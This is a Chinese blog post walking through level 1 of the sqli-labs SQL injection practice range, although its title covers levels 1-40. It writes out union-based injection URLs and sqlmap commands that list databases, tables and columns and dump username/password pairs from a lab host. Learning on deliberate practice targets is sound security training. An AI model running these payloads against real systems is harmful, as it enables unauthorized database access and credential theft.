sql注入靶场(1-40关)

于 2024-05-30 15:52:19 发布
阅读量661 收藏 30
点赞数 30
分类专栏: 网络安全 文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45955617/article/details/139326407
版权

1、sqli-labs靶场搭建:参考:

sql-labs靶场环境搭建(手把手教你如何搭建)_sqlilabs靶场-CSDN博客

2、开始打靶

综合概述:

1-4、11-14:显注(union)

5-10、15-16:盲注

17-22:报错注入

23:过滤注释

24:二次注入

25-28a:过滤+双写绕过

29-31:http参数污染

32-37:宽字节注入

38-40:堆叠注入

第一关:

显注--union

1、不考虑工具sqlmap,手动注入

使用burp拦截流量,将流量进行主动地扫描,发现在id=1处存在漏洞。

#直接在URL处进行判断,查看输出的值是几列,如果报错就是超过了列数,没报错就是在范围内 ?id=1'order by 3 --+ 未报错

?id=1'order by 4 --+ 报错,说明只有三列

#获取当前系统的数据库名称以及数据库版本号

?id=-1'union select 1,database(),version()--+

获取所有的数据库,使用函数group_concat(column_name)将返回的结果,到一行显示 http://10.1.70.192:32769/Less-1/?id=1' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata --+

#获取yanhuo数据库里面所有的数据库表格

http://10.1.70.192:32769/Less-1/?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='yanhuo'--+

#获取li表格里面的信息 http://10.1.70.192:32769/Less-1/?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='li'--+

#获取li表格里面的信息 http://10.1.70.192:32769/Less-1/?id=-1' union select 1,2,group_concat(username, '|', password) from yanhuo.li--+

2、使用工具sqlmap

#打开命令行,使用sqlmap工具:会出来6个数据库(安装好以后是只有5个,但是我们有新创建了一个)

sqlmap -u "http://10.1.70.192:32769/Less-1/?id=1" -p id --dbs

#如果提示5个数据库,表示之前进行过测试,本地有了缓存,使用参数–flush-session刷新即可 sqlmap -u "http://10.1.70.192:32769/Less-1/?id=1" -p id --dbs –flush-session

#检索yanhuo数据库里面的所有信息

sqlmap -u "http://10.1.70.192:32769/Less-1/?id=1" -p id -D yanhuo --tables

#检索li表格里面的所有数据结构

sqlmap -u "http://10.1.70.192:32769/Less-1/?id=1" -p id -D yanhuo -T li --columns

#将li表格里面的数据罗列出来

sqlmap -u "http://10.1.70.192:32769/Less-1/?id=1" -p id -D yanhuo -T li --dump

yh-ca
关注
  • 30
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sql注入靶场实操
m0_46104808的博客
10-27 1562
sql注入漏洞利用
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 5147
下面选取几个具有代表性的卡,演示几种 SQL 注入漏洞利用方法。
SQL注入--靶场练习
wmr123456001的博客
02-11 2052
SQL注入靶场练习
SQL 注入之 Windows/Docker 环境 SQLi-labs 靶场搭建!
朱雀随云记的博客
04-07 1830
4、打开浏览器,输入“http://windows服务器ip/sqli-labs-master/” ,可以看到如下的界面,点击“Setup/reset Database for labs”,会出现Access denied的提示。3、执行:docker run -dt --name sqli-labs -p 81:80 --rm acgpiano/sqli-labs, 将镜像运行为容器。--name sqli-labs 将容器命名为sqli-labs。acgpiano/sqli-labs 镜像名。
SQL 靶场
weixin_45971758的博客
05-19 700
学习文章。
sql靶场搭建
antRain的博客
05-28 507
sqli-labs靶场搭建 参考WEB靶场搭建教程(PHPstudy+SQLllib+DVWA+upload-labs) 若mysql服务无法启动,检测电脑是否装了mysql ,如果装了 在 services.msc 把mysql 服务掉,重启phpstudy ,重新启动mysql 在使用sqli-labs 重置数据库信息 Setup/reset Database for labs 报错: 从PHP5.0开始就不推荐使用mysql_connect()函数,到了php7.0则直接废弃了该函数 所以需要修
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sql注入靶场.zip
06-24
这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL注入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
sql-lap注入靶场
05-02
这个"sql-lap注入靶场"是专门为学习和实践SQL注入漏洞而设计的一个平台。在这个靶场中,你可以模拟黑客攻击,体验如何利用SQL注入来破解系统,同时也能够提升你的安全防护意识和技能。 SQL注入攻击的基本原理是,...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-sql注入著名靶场
03-28
sql注入著名靶场,配合phpstudy食用
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
sql靶场8-10
09-24
sql靶场8-10详解
SQL靶场搭建
最新发布
m0_66993332的博客
05-16 433
简单介绍一下SQL靶场的搭建,以及在搭建过程中遇到的一些问题。使用该软件搭建靶场相对简单,适合新手小白。当然,也可以在自己的虚拟机下进行搭建,相对来说就较为复杂。本章主要讲解使用Phpstudy进行SQL靶场搭建。这里我推荐使用的是Phpstudy这个软件,下面是它的官网小皮面板(phpstudy) - 让天下没有难配的服务器环境!(xp.cn)
SQL靶场练习(包含字符型、数字型、宽字节、post)
Lorezon的博客
01-13 565
一:字符型注入 当输入的参数为字符串时,称为字符型,需要用单引号来闭合。 初始页面是这样的: 第一步:判断注入类型 1.在name=root 后添加一个单引号使之变为name=root',发现页面返回错误: 说明存在注入。 2.接下来构造语句name=root' and '1'=1--+',页面返回正常: 将and '1'=1改成and '1'=2,发现页面返回错误: 说明这里的注入是字符型注入。...
SQL实践之sqli-labs靶场(持续更新)
m0_62102520的博客
07-08 577
总结1、寻找注入点2、判断闭合方式3、验证漏洞4、判断列数及回显位5、取数据取数据库名根据数据库名,取表名根据数据库名、表名,取列名取具体数据。
SQL靶场的建立
Edmund0A的博客
07-12 398
????SQL靶场搭建 ▲ 本次自学搭建sql靶场 ⚪下载安装靶场 ▲1. 进入页面下载靶场文件:SQLI靶场 ▲2. 将靶场文件解压至系统盘内。 ⚪靶场的设置 ▲1. 首先进入 “sqli-labs-master"文件夹内的"sql-connerctions"文件夹,打开其中的"db-creds.inc” 文件进行编辑。在该文件我们可以看到一串代码, ...
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 5965
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的https://github.com/Audi-1/sqli-labs下载sqli-labs项目。 2. 安装Web服务器:您需要在本地或者服务器上安装一个Web服务器,例如Apache或Nginx。 3. 将sqli-labs项目放置在Web服务器的根目录下:将下载的sqli-labs项目解压,并将解压后的文件夹放置在Web服务器的根目录下。 4. 配置数据库sqli-labs使用MySQL数据库作为后端数据库。您需要创建一个新的数据库,并将数据库的连接信息配置到sqli-labs项目的配置文件中。 5. 导入数据库表结构:在MySQL数据库中,导入sqli-labs项目提供的SQL文件,以创建所需的表结构和数据。 6. 启动Web服务器:启动您的Web服务器,并确保sqli-labs项目可以通过浏览器访问。 7. 访问sqli-labs靶场:在浏览器中输入您的Web服务器地址,加上sqli-labs项目的路径,即可访问sqli-labs靶场。 请注意,搭建sqli-labs靶场需要一定的技术基础和安全意识。在进行任何实验之前,请确保您已经了解了SQL注入的风险,并采取适当的安全措施,以避免对系统造成损害。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值